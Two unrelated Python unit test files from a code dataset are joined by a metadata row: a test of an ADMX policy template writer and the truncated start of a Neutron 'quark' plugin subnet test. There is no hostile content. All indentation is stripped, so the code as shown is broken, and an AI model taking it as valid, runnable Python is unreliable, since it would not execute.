class AdmxWriterUnittest(xml_writer_base_unittest.XmlWriterBaseTest):
def _CreateDocumentElement(self):
dom_impl = minidom.getDOMImplementation('')
doc = dom_impl.createDocument(None, 'root', None)
return doc.documentElement
def setUp(self):
# Writer configuration. This dictionary contains parameter used by the ADMX
# Writer
config = {
'win_supported_os': 'SUPPORTED_TESTOS',
'win_supported_os_win7': 'SUPPORTED_TESTOS_2',
'win_config': {
'win': {
'reg_mandatory_key_name':
'Software\\Policies\\Test',
'reg_recommended_key_name':
'Software\\Policies\\Test\\Recommended',
'mandatory_category_path': ['test_category'],
'recommended_category_path': ['test_recommended_category'],
'category_path_strings': {
'test_category': 'TestCategory',
'test_recommended_category': 'TestCategory - recommended',
},
'namespace':
'ADMXWriter.Test.Namespace',
},
'chrome_os': {
'reg_mandatory_key_name':
'Software\\Policies\\CrOSTest',
'reg_recommended_key_name':
'Software\\Policies\\CrOSTest\\Recommended',
'mandatory_category_path': ['cros_test_category'],
'recommended_category_path': ['cros_test_recommended_category'],
'category_path_strings': {
'cros_test_category':
'CrOSTestCategory',
'cros_test_recommended_category':
'CrOSTestCategory - recommended',
},
'namespace':
'ADMXWriter.Test.Namespace.ChromeOS',
},
},
'admx_prefix': 'test_prefix',
'build': 'test_product',
}
self.writer = self._GetWriter(config)
self.writer.Init()
def _GetWriter(self, config):
return admx_writer.GetWriter(config)
def _GetKey(self):
return "Test"
def _GetCategory(self):
return "test_category"
def _GetCategoryRec(self):
return "test_recommended_category"
def _GetNamespace(self):
return "ADMXWriter.Test.Namespace"
def _GetPoliciesElement(self, doc):
node_list = doc.getElementsByTagName('policies')
self.assertTrue(node_list.length == 1)
return node_list.item(0)
def _GetCategoriesElement(self, doc):
node_list = doc.getElementsByTagName('categories')
self.assertTrue(node_list.length == 1)
return node_list.item(0)
def testEmpty(self):
self.writer.BeginTemplate()
self.writer.EndTemplate()
output = self.writer.GetTemplateText()
expected_output = (
'<?xml version="1.0" ?>\n'
'<policyDefinitions revision="1.0" schemaVersion="1.0">\n'
' <policyNamespaces>\n'
' <target namespace="' + self._GetNamespace() + '"'
' prefix="test_prefix"/>\n'
' <using namespace="Microsoft.Policies.Windows" prefix="windows"/>\n'
' </policyNamespaces>\n'
' <resources minRequiredRevision="1.0"/>\n'
' <supportedOn>\n'
' <definitions>\n'
' <definition displayName="'
'$(string.SUPPORTED_TESTOS)" name="SUPPORTED_TESTOS"/>\n'
' <definition displayName="'
'$(string.SUPPORTED_TESTOS_2)" name="SUPPORTED_TESTOS_2"/>\n'
' </definitions>\n'
' </supportedOn>\n'
' <categories>\n'
' <category displayName="$(string.' + self._GetCategory() + ')"'
' name="' + self._GetCategory() + '"/>\n'
' <category displayName="$(string.' + self._GetCategoryRec() + ')"'
' name="' + self._GetCategoryRec() + '"/>\n'
' </categories>\n'
' <policies/>\n'
'</policyDefinitions>')
self.AssertXMLEquals(output, expected_output)
def testEmptyVersion(self):
self.writer.config['version'] = '39.0.0.0'
self.writer.BeginTemplate()
self.writer.EndTemplate()
output = self.writer.GetTemplateText()
expected_output = (
'<?xml version="1.0" ?>\n'
'<policyDefinitions revision="1.0" schemaVersion="1.0">\n'
' <!--test_product version: 39.0.0.0-->\n'
' <policyNamespaces>\n'
' <target namespace="' + self._GetNamespace() + '"'
' prefix="test_prefix"/>\n'
' <using namespace="Microsoft.Policies.Windows" prefix="windows"/>\n'
' </policyNamespaces>\n'
' <resources minRequiredRevision="1.0"/>\n'
' <supportedOn>\n'
' <definitions>\n'
' <definition displayName="'
'$(string.SUPPORTED_TESTOS)" name="SUPPORTED_TESTOS"/>\n'
' <definition displayName="'
'$(string.SUPPORTED_TESTOS_2)" name="SUPPORTED_TESTOS_2"/>\n'
' </definitions>\n'
' </supportedOn>\n'
' <categories>\n'
' <category displayName="$(string.' + self._GetCategory() + ')"'
' name="' + self._GetCategory() + '"/>\n'
' <category displayName="$(string.' + self._GetCategoryRec() + ')"'
' name="' + self._GetCategoryRec() + '"/>\n'
' </categories>\n'
' <policies/>\n'
'</policyDefinitions>')
self.AssertXMLEquals(output, expected_output)
def testEmptyPolicyGroup(self):
empty_policy_group = {'name': 'PolicyGroup', 'policies': []}
# Initialize writer to write a policy group.
self.writer.BeginTemplate()
# Write policy group
self.writer.BeginPolicyGroup(empty_policy_group)
self.writer.EndPolicyGroup()
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = ''
self.AssertXMLEquals(output, expected_output)
output = self.GetXMLOfChildren(self._GetCategoriesElement(self.writer._doc))
expected_output = (
'<category displayName="$(string.' + self._GetCategory() + ')"'
' name="' + self._GetCategory() + '"/>\n'
'<category displayName="$(string.' + self._GetCategoryRec() + ')"'
' name="' + self._GetCategoryRec() + '"/>\n'
'<category displayName="$(string.PolicyGroup_group)"'
' name="PolicyGroup">\n'
' <parentCategory ref="' + self._GetCategory() + '"/>\n'
'</category>')
self.AssertXMLEquals(output, expected_output)
def testPolicyGroup(self):
empty_policy_group = {
'name':
'PolicyGroup',
'policies': [
{
'name': 'PolicyStub2',
'type': 'main'
},
{
'name': 'PolicyStub1',
'type': 'main'
},
]
}
# Initialize writer to write a policy group.
self.writer.BeginTemplate()
# Write policy group
self.writer.BeginPolicyGroup(empty_policy_group)
self.writer.EndPolicyGroup()
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = ''
self.AssertXMLEquals(output, expected_output)
output = self.GetXMLOfChildren(self._GetCategoriesElement(self.writer._doc))
expected_output = (
'<category displayName="$(string.' + self._GetCategory() + ')"'
' name="' + self._GetCategory() + '"/>\n'
'<category displayName="$(string.' + self._GetCategoryRec() + ')"'
' name="' + self._GetCategoryRec() + '"/>\n'
'<category displayName="$(string.PolicyGroup_group)"'
' name="PolicyGroup">\n'
' <parentCategory ref="' + self._GetCategory() + '"/>\n'
'</category>')
self.AssertXMLEquals(output, expected_output)
def _initWriterForPolicy(self, writer, policy):
'''Initializes the writer to write the given policy next.
'''
policy_group = {'name': 'PolicyGroup', 'policies': [policy]}
writer.BeginTemplate()
writer.BeginPolicyGroup(policy_group)
def testMainPolicy(self):
main_policy = {
'name': 'DummyMainPolicy',
'type': 'main',
}
self._initWriterForPolicy(self.writer, main_policy)
self.writer.WritePolicy(main_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="' + self.writer.GetClass(main_policy) + '"'
' displayName="$(string.DummyMainPolicy)"'
' explainText="$(string.DummyMainPolicy_Explain)"'
' key="Software\\Policies\\' + self._GetKey() + '"'
' name="DummyMainPolicy"'
' presentation="$(presentation.DummyMainPolicy)"'
' valueName="DummyMainPolicy">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <enabledValue>\n'
' <decimal value="1"/>\n'
' </enabledValue>\n'
' <disabledValue>\n'
' <decimal value="0"/>\n'
' </disabledValue>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testRecommendedPolicy(self):
main_policy = {
'name': 'DummyMainPolicy',
'type': 'main',
}
policy_group = {
'name': 'PolicyGroup',
'policies': [main_policy],
}
self.writer.BeginTemplate()
self.writer.BeginRecommendedPolicyGroup(policy_group)
self.writer.WriteRecommendedPolicy(main_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="' + self.writer.GetClass(main_policy) + '"'
' displayName="$(string.DummyMainPolicy)"'
' explainText="$(string.DummyMainPolicy_Explain)"'
' key="Software\\Policies\\' + self._GetKey() + '\\Recommended"'
' name="DummyMainPolicy_recommended"'
' presentation="$(presentation.DummyMainPolicy)"'
' valueName="DummyMainPolicy">\n'
' <parentCategory ref="PolicyGroup_recommended"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <enabledValue>\n'
' <decimal value="1"/>\n'
' </enabledValue>\n'
' <disabledValue>\n'
' <decimal value="0"/>\n'
' </disabledValue>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testRecommendedOnlyPolicy(self):
main_policy = {
'name': 'DummyMainPolicy',
'type': 'main',
'features': {
'can_be_recommended': True,
'can_be_mandatory': False,
}
}
policy_group = {
'name': 'PolicyGroup',
'policies': [main_policy],
}
self.writer.BeginTemplate()
self.writer.BeginRecommendedPolicyGroup(policy_group)
self.writer.WritePolicy(main_policy)
self.writer.WriteRecommendedPolicy(main_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="' + self.writer.GetClass(main_policy) + '"'
' displayName="$(string.DummyMainPolicy)"'
' explainText="$(string.DummyMainPolicy_Explain)"'
' key="Software\\Policies\\' + self._GetKey() + '\\Recommended"'
' name="DummyMainPolicy_recommended"'
' presentation="$(presentation.DummyMainPolicy)"'
' valueName="DummyMainPolicy">\n'
' <parentCategory ref="PolicyGroup_recommended"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <enabledValue>\n'
' <decimal value="1"/>\n'
' </enabledValue>\n'
' <disabledValue>\n'
' <decimal value="0"/>\n'
' </disabledValue>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testStringPolicy(self):
string_policy = {
'name': 'SampleStringPolicy',
'type': 'string',
}
self._initWriterForPolicy(self.writer, string_policy)
self.writer.WritePolicy(string_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="' + self.writer.GetClass(string_policy) + '"'
' displayName="$(string.SampleStringPolicy)"'
' explainText="$(string.SampleStringPolicy_Explain)"'
' key="Software\\Policies\\' + self._GetKey() + '"'
' name="SampleStringPolicy"'
' presentation="$(presentation.SampleStringPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <text id="SampleStringPolicy" maxLength="1000000"'
' valueName="SampleStringPolicy"/>\n'
' </elements>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testIntPolicy(self):
int_policy = {
'name': 'SampleIntPolicy',
'type': 'int',
}
self._initWriterForPolicy(self.writer, int_policy)
self.writer.WritePolicy(int_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="' + self.writer.GetClass(int_policy) + '"'
' displayName="$(string.SampleIntPolicy)"'
' explainText="$(string.SampleIntPolicy_Explain)"'
' key="Software\\Policies\\' + self._GetKey() + '"'
' name="SampleIntPolicy"'
' presentation="$(presentation.SampleIntPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <decimal id="SampleIntPolicy" maxValue="2000000000" minValue="0" '
'valueName="SampleIntPolicy"/>\n'
' </elements>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testIntPolicyWithWin7Only(self):
int_policy = {
'name': 'SampleIntPolicy',
'type': 'int',
'supported_on': [{
'platform': 'win7',
}]
}
self._initWriterForPolicy(self.writer, int_policy)
self.writer.WritePolicy(int_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="' + self.writer.GetClass(int_policy) + '"'
' displayName="$(string.SampleIntPolicy)"'
' explainText="$(string.SampleIntPolicy_Explain)"'
' key="Software\\Policies\\' + self._GetKey() + '"'
' name="SampleIntPolicy"'
' presentation="$(presentation.SampleIntPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS_2"/>\n'
' <elements>\n'
' <decimal id="SampleIntPolicy" maxValue="2000000000" minValue="0" '
'valueName="SampleIntPolicy"/>\n'
' </elements>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testIntEnumPolicy(self):
enum_policy = {
'name':
'SampleEnumPolicy',
'type':
'int-enum',
'items': [
{
'name': 'item_1',
'value': 0
},
{
'name': 'item_2',
'value': 1
},
]
}
self._initWriterForPolicy(self.writer, enum_policy)
self.writer.WritePolicy(enum_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="' + self.writer.GetClass(enum_policy) + '"'
' displayName="$(string.SampleEnumPolicy)"'
' explainText="$(string.SampleEnumPolicy_Explain)"'
' key="Software\\Policies\\' + self._GetKey() + '"'
' name="SampleEnumPolicy"'
' presentation="$(presentation.SampleEnumPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <enum id="SampleEnumPolicy" valueName="SampleEnumPolicy">\n'
' <item displayName="$(string.SampleEnumPolicy_item_1)">\n'
' <value>\n'
' <decimal value="0"/>\n'
' </value>\n'
' </item>\n'
' <item displayName="$(string.SampleEnumPolicy_item_2)">\n'
' <value>\n'
' <decimal value="1"/>\n'
' </value>\n'
' </item>\n'
' </enum>\n'
' </elements>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testStringEnumPolicy(self):
enum_policy = {
'name':
'SampleEnumPolicy',
'type':
'string-enum',
'items': [
{
'name': 'item_1',
'value': 'one'
},
{
'name': 'item_2',
'value': 'two'
},
]
}
# This test is different than the others because it also tests that space
# usage inside <string> nodes is correct.
dom_impl = minidom.getDOMImplementation('')
self.writer._doc = dom_impl.createDocument(None, 'policyDefinitions', None)
self.writer._active_policies_elem = self.writer._doc.documentElement
self.writer._active_mandatory_policy_group_name = 'PolicyGroup'
self.writer.WritePolicy(enum_policy)
output = self.writer.GetTemplateText()
expected_output = (
'<?xml version="1.0" ?>\n'
'<policyDefinitions>\n'
' <policy class="' + self.writer.GetClass(enum_policy) + '"'
' displayName="$(string.SampleEnumPolicy)"'
' explainText="$(string.SampleEnumPolicy_Explain)"'
' key="Software\\Policies\\' + self._GetKey() + '"'
' name="SampleEnumPolicy"'
' presentation="$(presentation.SampleEnumPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <enum id="SampleEnumPolicy" valueName="SampleEnumPolicy">\n'
' <item displayName="$(string.SampleEnumPolicy_item_1)">\n'
' <value>\n'
' <string>one</string>\n'
' </value>\n'
' </item>\n'
' <item displayName="$(string.SampleEnumPolicy_item_2)">\n'
' <value>\n'
' <string>two</string>\n'
' </value>\n'
' </item>\n'
' </enum>\n'
' </elements>\n'
' </policy>\n'
'</policyDefinitions>')
self.AssertXMLEquals(output, expected_output)
def testListPolicy(self):
list_policy = {
'name': 'SampleListPolicy',
'type': 'list',
}
self._initWriterForPolicy(self.writer, list_policy)
self.writer.WritePolicy(list_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="' + self.writer.GetClass(list_policy) + '"'
' displayName="$(string.SampleListPolicy)"'
' explainText="$(string.SampleListPolicy_Explain)"'
' key="Software\\Policies\\' + self._GetKey() + '"'
' name="SampleListPolicy"'
' presentation="$(presentation.SampleListPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <list id="SampleListPolicyDesc"'
' key="Software\Policies\\' + self._GetKey() + '\SampleListPolicy"'
' valuePrefix=""/>\n'
' </elements>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testStringEnumListPolicy(self):
list_policy = {
'name':
'SampleListPolicy',
'type':
'string-enum-list',
'items': [
{
'name': 'item_1',
'value': 'one'
},
{
'name': 'item_2',
'value': 'two'
},
]
}
self._initWriterForPolicy(self.writer, list_policy)
self.writer.WritePolicy(list_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="' + self.writer.GetClass(list_policy) + '"'
' displayName="$(string.SampleListPolicy)"'
' explainText="$(string.SampleListPolicy_Explain)"'
' key="Software\\Policies\\' + self._GetKey() + '"'
' name="SampleListPolicy"'
' presentation="$(presentation.SampleListPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <list id="SampleListPolicyDesc"'
' key="Software\Policies\\' + self._GetKey() + '\SampleListPolicy"'
' valuePrefix=""/>\n'
' </elements>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testDictionaryPolicy(self, is_external=False):
dict_policy = {
'name': 'SampleDictionaryPolicy',
'type': 'external' if is_external else 'dict',
}
self._initWriterForPolicy(self.writer, dict_policy)
self.writer.WritePolicy(dict_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="' + self.writer.GetClass(dict_policy) + '"'
' displayName="$(string.SampleDictionaryPolicy)"'
' explainText="$(string.SampleDictionaryPolicy_Explain)"'
' key="Software\\Policies\\' + self._GetKey() + '"'
' name="SampleDictionaryPolicy"'
' presentation="$(presentation.SampleDictionaryPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <text id="SampleDictionaryPolicy" maxLength="1000000"'
' valueName="SampleDictionaryPolicy"/>\n'
' </elements>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testExternalPolicy(self):
self.testDictionaryPolicy(is_external=True)
def testPlatform(self):
# Test that the writer correctly chooses policies of platform Windows.
self.assertTrue(
self.writer.IsPolicySupported({
'supported_on': [{
'platform': 'win'
}, {
'platform': 'aaa'
}]
}))
self.assertFalse(
self.writer.IsPolicySupported({
'supported_on': [{
'platform': 'mac'
}, {
'platform': 'aaa'
}, {
'platform': 'linux'
}]
}))
def testStringEncodings(self):
enum_policy_a = {
'name': 'SampleEnumPolicy.A',
'type': 'string-enum',
'items': [{
'name': 'tls1.2',
'value': 'tls1.2'
}]
}
enum_policy_b = {
'name': 'SampleEnumPolicy.B',
'type': 'string-enum',
'items': [{
'name': 'tls1.2',
'value': 'tls1.2'
}]
}
dom_impl = minidom.getDOMImplementation('')
self.writer._doc = dom_impl.createDocument(None, 'policyDefinitions', None)
self.writer._active_policies_elem = self.writer._doc.documentElement
self.writer._active_mandatory_policy_group_name = 'PolicyGroup'
self.writer.WritePolicy(enum_policy_a)
self.writer.WritePolicy(enum_policy_b)
output = self.writer.GetTemplateText()
expected_output = (
'<?xml version="1.0" ?>\n'
'<policyDefinitions>\n'
' <policy class="' + self.writer.GetClass(enum_policy_a) + '"'
' displayName="$(string.SampleEnumPolicy_A)"'
' explainText="$(string.SampleEnumPolicy_A_Explain)"'
' key="Software\\Policies\\' + self._GetKey() + '"'
' name="SampleEnumPolicy.A"'
' presentation="$(presentation.SampleEnumPolicy.A)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <enum id="SampleEnumPolicy.A" valueName="SampleEnumPolicy.A">\n'
' <item displayName="$(string.SampleEnumPolicy_A_tls1_2)">\n'
' <value>\n'
' <string>tls1.2</string>\n'
' </value>\n'
' </item>\n'
' </enum>\n'
' </elements>\n'
' </policy>\n'
' <policy class="' + self.writer.GetClass(enum_policy_b) + '"'
' displayName="$(string.SampleEnumPolicy_B)"'
' explainText="$(string.SampleEnumPolicy_B_Explain)"'
' key="Software\\Policies\\' + self._GetKey() + '"'
' name="SampleEnumPolicy.B"'
' presentation="$(presentation.SampleEnumPolicy.B)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <enum id="SampleEnumPolicy.B" valueName="SampleEnumPolicy.B">\n'
' <item displayName="$(string.SampleEnumPolicy_B_tls1_2)">\n'
' <value>\n'
' <string>tls1.2</string>\n'
' </value>\n'
' </item>\n'
' </enum>\n'
' </elements>\n'
' </policy>\n'
'</policyDefinitions>')
self.AssertXMLEquals(output, expected_output)
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | 4,272,008,609,559,117,300 | 35.664286 | 80 | 0.561816 | false |
jkoelker/quark | quark/tests/plugin_modules/test_subnets.py | 1 | 36379 | # Copyright 2013 Openstack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import copy
import time
import uuid
import mock
from neutron.api.v2 import attributes as neutron_attrs
from neutron.common import exceptions
from neutron.openstack.common.notifier import api as notifier_api
from oslo.config import cfg
from quark.db import models
from quark.tests import test_quark_plugin
class TestQuarkGetSubnetCount(test_quark_plugin.TestQuarkPlugin):
def test_get_subnet_count(self):
"""This isn't really testable."""
with mock.patch("quark.db.api.subnet_count_all"):
self.plugin.get_subnets_count(self.context, {})
class TestQuarkGetSubnets(test_quark_plugin.TestQuarkPlugin):
@contextlib.contextmanager
def _stubs(self, subnets=None, routes=None):
if routes is None:
routes = []
route_models = []
for route in routes:
r = models.Route()
r.update(route)
route_models.append(r)
if isinstance(subnets, list):
subnet_models = []
for subnet in subnets:
s_dict = subnet.copy()
s_dict["routes"] = route_models
s = models.Subnet(network=models.Network())
s.update(s_dict)
subnet_models.append(s)
elif subnets:
mod = models.Subnet(network=models.Network())
mod.update(subnets)
mod["routes"] = route_models
subnet_models = mod
else:
subnet_models = None
with mock.patch("quark.db.api.subnet_find") as subnet_find:
subnet_find.return_value = subnet_models
yield
def test_subnets_list(self):
subnet_id = str(uuid.uuid4())
route = dict(id=1, cidr="0.0.0.0/0", gateway="192.168.0.1")
subnet = dict(id=subnet_id, network_id=1, name=subnet_id,
tenant_id=self.context.tenant_id, ip_version=4,
cidr="192.168.0.0/24", gateway_ip="192.168.0.1",
dns_nameservers=[],
enable_dhcp=None)
expected_route = dict(destination=route["cidr"],
nexthop=route["gateway"])
with self._stubs(subnets=[subnet], routes=[route]):
res = self.plugin.get_subnets(self.context, {}, {})
# Compare routes separately
routes = res[0].pop("host_routes")
for key in subnet.keys():
self.assertEqual(res[0][key], subnet[key])
for key in expected_route.keys():
self.assertEqual(routes[0][key], expected_route[key])
def test_subnet_show_fail(self):
with self._stubs():
with self.assertRaises(exceptions.SubnetNotFound):
self.plugin.get_subnet(self.context, 1)
def test_subnet_show(self):
subnet_id = str(uuid.uuid4())
route = dict(id=1, cidr="0.0.0.0/0", gateway="192.168.0.1",
subnet_id=subnet_id)
expected_route = dict(destination=route["cidr"],
nexthop=route["gateway"])
subnet = dict(id=subnet_id, network_id=1, name=subnet_id,
tenant_id=self.context.tenant_id, ip_version=4,
cidr="192.168.0.0/24", gateway_ip="192.168.0.1",
dns_nameservers=[],
enable_dhcp=None)
with self._stubs(subnets=subnet, routes=[route]):
res = self.plugin.get_subnet(self.context, subnet_id)
# Compare routes separately
routes = res.pop("host_routes")
for key in subnet.keys():
self.assertEqual(res[key], subnet[key])
for key in expected_route.keys():
self.assertEqual(routes[0][key], expected_route[key])
class TestQuarkCreateSubnetOverlapping(test_quark_plugin.TestQuarkPlugin):
@contextlib.contextmanager
def _stubs(self, subnets=None):
if subnets is None:
subnets = []
subnet_models = []
for subnet in subnets:
s = models.Subnet()
s.update(subnet)
subnet_models.append(s)
network = models.Network()
network.update(dict(id=1, subnets=subnet_models))
with contextlib.nested(
mock.patch("quark.db.api.network_find"),
mock.patch("quark.db.api.subnet_find"),
mock.patch("quark.db.api.subnet_create")
) as (net_find, subnet_find, subnet_create):
net_find.return_value = network
subnet_find.return_value = subnet_models
subnet_create.return_value = models.Subnet(
network=models.Network(),
cidr="192.168.1.1/24")
yield subnet_create
def test_create_subnet_overlapping_true(self):
cfg.CONF.set_override('allow_overlapping_ips', True)
with self._stubs() as subnet_create:
s = dict(subnet=dict(
gateway_ip=neutron_attrs.ATTR_NOT_SPECIFIED,
dns_nameservers=neutron_attrs.ATTR_NOT_SPECIFIED,
cidr="192.168.1.1/8",
network_id=1))
self.plugin.create_subnet(self.context, s)
self.assertEqual(subnet_create.call_count, 1)
def test_create_subnet_overlapping_false(self):
cfg.CONF.set_override('allow_overlapping_ips', False)
with self._stubs() as subnet_create:
s = dict(subnet=dict(
gateway_ip=neutron_attrs.ATTR_NOT_SPECIFIED,
dns_nameservers=neutron_attrs.ATTR_NOT_SPECIFIED,
cidr="192.168.1.1/8",
network_id=1))
self.plugin.create_subnet(self.context, s)
self.assertEqual(subnet_create.call_count, 1)
def test_create_subnet_overlapping_conflict(self):
cfg.CONF.set_override('allow_overlapping_ips', False)
with self._stubs(subnets=[dict(cidr="192.168.10.1/24")]):
with self.assertRaises(exceptions.InvalidInput):
s = dict(subnet=dict(cidr="192.168.1.1/8",
network_id=1))
self.plugin.create_subnet(self.context, s)
class TestQuarkCreateSubnetAllocationPools(test_quark_plugin.TestQuarkPlugin):
@contextlib.contextmanager
def _stubs(self, subnet):
s = models.Subnet(network=models.Network(id=1, subnets=[]))
s.update(subnet)
with contextlib.nested(
mock.patch("quark.db.api.network_find"),
mock.patch("quark.db.api.subnet_find"),
mock.patch("quark.db.api.subnet_create"),
) as (net_find, subnet_find, subnet_create):
net_find.return_value = s["network"]
subnet_find.return_value = []
subnet_create.return_value = s
yield subnet_create
def setUp(self):
super(TestQuarkCreateSubnetAllocationPools, self).setUp()
def tearDown(self):
super(TestQuarkCreateSubnetAllocationPools, self).tearDown()
def test_create_subnet_allocation_pools_zero(self):
s = dict(subnet=dict(
cidr="192.168.1.1/24",
network_id=1))
with self._stubs(s["subnet"]) as (subnet_create):
resp = self.plugin.create_subnet(self.context, s)
self.assertEqual(subnet_create.call_count, 1)
self.assertEqual(resp["allocation_pools"],
[dict(start="192.168.1.2", end="192.168.1.254")])
def test_create_subnet_allocation_pools_one(self):
pools = [dict(start="192.168.1.10", end="192.168.1.20")]
s = dict(subnet=dict(
allocation_pools=pools,
cidr="192.168.1.1/24",
network_id=1))
with self._stubs(s["subnet"]) as (subnet_create):
resp = self.plugin.create_subnet(self.context, s)
self.assertEqual(subnet_create.call_count, 1)
self.assertEqual(resp["allocation_pools"], pools)
def test_create_subnet_allocation_pools_two(self):
pools = [dict(start="192.168.1.10", end="192.168.1.20"),
dict(start="192.168.1.40", end="192.168.1.50")]
s = dict(subnet=dict(
allocation_pools=pools,
cidr="192.168.1.1/24",
network_id=1))
with self._stubs(s["subnet"]) as (subnet_create):
resp = self.plugin.create_subnet(self.context, s)
self.assertEqual(subnet_create.call_count, 1)
self.assertEqual(resp["allocation_pools"], pools)
def test_create_subnet_allocation_pools_empty_list(self):
pools = []
s = dict(subnet=dict(
allocation_pools=pools,
cidr="192.168.1.1/24",
network_id=1))
with self._stubs(s["subnet"]) as (subnet_create):
resp = self.plugin.create_subnet(self.context, s)
self.assertEqual(subnet_create.call_count, 1)
self.assertEqual(resp["allocation_pools"], pools)
# TODO(amir): Refactor the tests to test individual subnet attributes.
# * copy.deepcopy was necessary to maintain tests on keys, which is a bit ugly.
# * workaround is also in place for lame ATTR_NOT_SPECIFIED object()
class TestQuarkCreateSubnet(test_quark_plugin.TestQuarkPlugin):
@contextlib.contextmanager
def _stubs(self, subnet=None, network=None, routes=None, dns=None):
if network:
net = models.Network()
net.update(network)
network = net
subnet_mod = models.Subnet(network=models.Network())
dns_ips = subnet.pop("dns_nameservers", [])
host_routes = subnet.pop("host_routes", [])
subnet_mod.update(subnet)
subnet["dns_nameservers"] = dns_ips
subnet["host_routes"] = host_routes
routes = routes or []
dns = dns or []
route_models = [models.Route(**r) for r in routes]
dns_models = [models.DNSNameserver(**d) for d in dns]
with contextlib.nested(
mock.patch("quark.db.api.subnet_create"),
mock.patch("quark.db.api.network_find"),
mock.patch("quark.db.api.dns_create"),
mock.patch("quark.db.api.route_create"),
) as (subnet_create, net_find, dns_create, route_create):
subnet_create.return_value = subnet_mod
net_find.return_value = network
route_create.side_effect = route_models
dns_create.side_effect = dns_models
yield subnet_create, dns_create, route_create
def test_create_subnet(self):
routes = [dict(cidr="0.0.0.0/0", gateway="0.0.0.0")]
subnet = dict(
subnet=dict(network_id=1,
tenant_id=self.context.tenant_id, ip_version=4,
cidr="172.16.0.0/24", gateway_ip="0.0.0.0",
dns_nameservers=neutron_attrs.ATTR_NOT_SPECIFIED,
host_routes=neutron_attrs.ATTR_NOT_SPECIFIED,
enable_dhcp=None))
network = dict(network_id=1)
with self._stubs(
subnet=subnet["subnet"],
network=network,
routes=routes
) as (subnet_create, dns_create, route_create):
dns_nameservers = subnet["subnet"].pop("dns_nameservers")
host_routes = subnet["subnet"].pop("host_routes")
subnet_request = copy.deepcopy(subnet)
subnet_request["subnet"]["dns_nameservers"] = dns_nameservers
subnet_request["subnet"]["host_routes"] = host_routes
res = self.plugin.create_subnet(self.context,
subnet_request)
self.assertEqual(subnet_create.call_count, 1)
self.assertEqual(dns_create.call_count, 0)
self.assertEqual(route_create.call_count, 1)
for key in subnet["subnet"].keys():
if key == "host_routes":
self.assertEqual(res[key][0]["destination"], "0.0.0.0/0")
self.assertEqual(res[key][0]["nexthop"], "0.0.0.0")
else:
self.assertEqual(res[key], subnet["subnet"][key])
def test_create_subnet_no_network_fails(self):
subnet = dict(subnet=dict(network_id=1))
with self._stubs(subnet=dict(), network=None):
with self.assertRaises(exceptions.NetworkNotFound):
self.plugin.create_subnet(self.context, subnet)
def test_create_subnet_no_gateway_ip_defaults(self):
routes = [dict(cidr="0.0.0.0/0", gateway="172.16.0.1")]
subnet = dict(
subnet=dict(network_id=1,
tenant_id=self.context.tenant_id, ip_version=4,
cidr="172.16.0.0/24",
